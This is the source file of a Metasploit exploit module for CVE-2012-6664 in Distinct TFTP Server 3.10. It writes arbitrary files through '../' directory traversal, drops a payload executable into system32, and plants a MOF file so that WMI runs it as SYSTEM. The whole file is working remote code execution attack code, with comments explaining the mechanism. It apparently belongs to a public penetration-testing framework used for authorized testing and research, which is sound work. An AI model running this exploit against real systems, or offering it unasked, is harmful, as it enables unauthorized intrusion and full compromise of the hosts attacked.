GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/distinct_tftp_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
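class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  # Module metadata and options.
  #
  # DEPTH is the number of "../" segments prepended to every remote path so the
  # TFTP write escapes the server's root directory and lands under
  # \WINDOWS\system32 (see #exploit). RHOST/RPORT select the TFTP service,
  # UDP/69 by default. The module is marked Privileged because the dropped
  # payload is launched by the WMI service, i.e. as SYSTEM.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution',
        'Description' => %q{
          This module exploits a directory traversal vulnerability in the TFTP
          Server component of Distinct Intranet Servers version 3.10 which
          allows a remote attacker to write arbitrary files to the server file
          system, resulting in code execution under the context of 'SYSTEM'.
          This module has been tested successfully on TFTP Server version 3.10
          on Windows XP SP3 (EN).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'modpr0be', # Initial discovery, PoC (Tom Gregory)
            'sinn3r' # Metasploit
          ],
        'References' =>
          [
            ['OSVDB', '80984'],
            ['EDB', '18718'],
            ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
            ['CVE', '2012-6664']
          ],
        'Payload' =>
          {
            'BadChars' => "\x00"
          },
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
        'Platform' => 'win',
        'Targets' =>
          [
            ['Automatic', { 'auto' => true }],
          ],
        'Privileged' => true,
        'DisclosureDate' => '2012-04-08',
        'DefaultTarget' => 0
      )
    )

    register_options([
      OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]),
      OptAddress.new('RHOST', [true, 'The remote TFTP server address']),
      OptPort.new('RPORT', [true, 'The remote TFTP server port', 69])
    ])
  end

  # Writes +data+ to +filename+ on the target with a single TFTP write request
  # (WRQ) in octet mode.
  #
  # The payload bytes are handed to the Rex client in-memory via the
  # "DATA:<bytes>" LocalFile convention, so nothing is staged on the local
  # disk. Each call binds a fresh random high source port. Once the WRQ has
  # been sent the method waits in one-second steps, calling #stop on the client
  # on each pass, and returns when the client reports the transfer complete.
  # Whether a silent server is bounded by that #stop call depends on
  # Rex::Proto::TFTP::Client internals, which are not visible here -- verify if
  # the module appears to hang against an unresponsive host.
  #
  # @param filename [String] remote path, including any "../" traversal prefix
  # @param data [String] raw file contents to write
  # @return [void]
  def upload(filename, data)
    tftp_client = Rex::Proto::TFTP::Client.new(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => 1025 + rand(0xffff - 1025),
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => datastore['RPORT'],
      'LocalFile' => "DATA:#{data}",
      'RemoteFile' => filename,
      'Mode' => 'octet',
      'Context' => { 'Msf' => framework, 'MsfExploit' => self },
      'Action' => :upload
    )

    tftp_client.send_write_request { |msg| print_status(msg) }
    until tftp_client.complete
      select(nil, nil, nil, 1)
      tftp_client.stop
    end
  end

  # Drops the payload EXE into \WINDOWS\system32 via path traversal, then drops
  # a MOF file into \WINDOWS\system32\wbem\mof that references the EXE. The WMI
  # service compiles MOF files placed there and runs the referenced binary as
  # SYSTEM (the mechanism Msf::Exploit::WbemExec relies on; it is only expected
  # to exist on XP/2003-era targets, matching the tested platform above).
  #
  # Caveats a user should be aware of:
  # - The system root is hard-coded as \WINDOWS; hosts installed under a
  #   different directory (e.g. \WINNT) will not be hit without editing the
  #   path.
  # - Cleanup paths are registered relative, not absolute, and so presumably
  #   assume the session's working directory is system32 -- confirm on the
  #   target if artifacts remain after cleanup.
  #
  # @raise via fail_with(Failure::BadConfig) when DEPTH is negative
  # @return [void]
  def exploit
    depth = datastore['DEPTH'].to_i
    # String#* raises ArgumentError on a negative count, which would surface as
    # an unhandled exception; reject it as a configuration error instead.
    # Zero is allowed: it simply writes without a traversal prefix.
    fail_with(Failure::BadConfig, 'DEPTH must be zero or a positive integer') if depth < 0

    exe_name = "#{rand_text_alpha(8..15)}.exe"
    exe = generate_payload_exe
    mof_name = "#{rand_text_alpha(8..15)}.mof"
    mof = generate_mof(mof_name, exe_name)
    traversal = '../' * depth

    print_status("Sending EXE (#{exe.length} bytes)")
    upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe)
    register_file_for_cleanup(exe_name)

    # Let the TFTP server idle a bit before sending another file
    select(nil, nil, nil, 3)

    print_status("Sending MOF (#{mof.length} bytes)")
    upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
    # After compilation WMI moves the MOF into wbem\mof\good, so that is the
    # artifact to remove.
    register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
  end
end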